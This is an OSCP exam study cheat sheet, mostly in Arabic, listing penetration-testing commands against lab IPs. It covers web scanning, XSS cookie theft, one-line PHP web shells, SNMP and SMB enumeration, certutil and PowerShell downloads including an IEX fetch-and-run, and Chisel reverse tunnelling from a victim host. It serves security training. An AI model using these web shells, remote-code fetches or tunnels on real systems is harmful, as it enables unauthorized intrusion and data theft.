
دليل دراسة OSCP
فحص Nikto:
nikto -h http://10.10.10.1
اكتشاف الدلائل باستخدام أدوات مختلفة:
DIRB
dirb http://10.10.10.1
Gobuster
gobuster dir -u http://10.129.155.74:3000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx
حمولات XSS: المرجع السريع: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
اختبار نموذج XSS الأساسي باستخدام مستمع netcat أو خادم ويب بايثون
البرمجة النصية عبر المواقع لتفريغ ملفات تعريف الارتباط بترميز base64. تأكد من ترميز العنوان URL في Burp باستخدام ctrl + u
المرجع: https://sushant747.gitbooks.io/total-oscp-guide/content/webshell.html
قشرة ويب PHP بسيطة لتنفيذ الأوامر
<?php system($_REQUEST ['cmd']) ?>
<?php system($_GET['cmd']); ?>
المنفذ 161 UDP
snmpwalk -c public -v2c 10.129.213.210
snmp-check 10.129.213.210
crackmapexec smb 10.129.70.254
اكتشاف المشاركات المجهولة المفتوحة
smbclient -L //10.129.70.254
المصادقة الفارغة
smbclient -N -L //10.129.70.254
Certutil:
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
PowerShell:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.11.0.4/nc.exe')"
باستخدام Chisel:
مثال باستخدام إعادة توجيه المنافذ لجعل المنفذ 910 متاحًا على جهاز Kali
on victim machine setup port forwarding
chisel.exe client 10.10.16.10:5555 R:910:127.0.0.1:910
On Kali attack box setup a reverse listner for port forward with chisel
./chisel server --port 5555 --reverse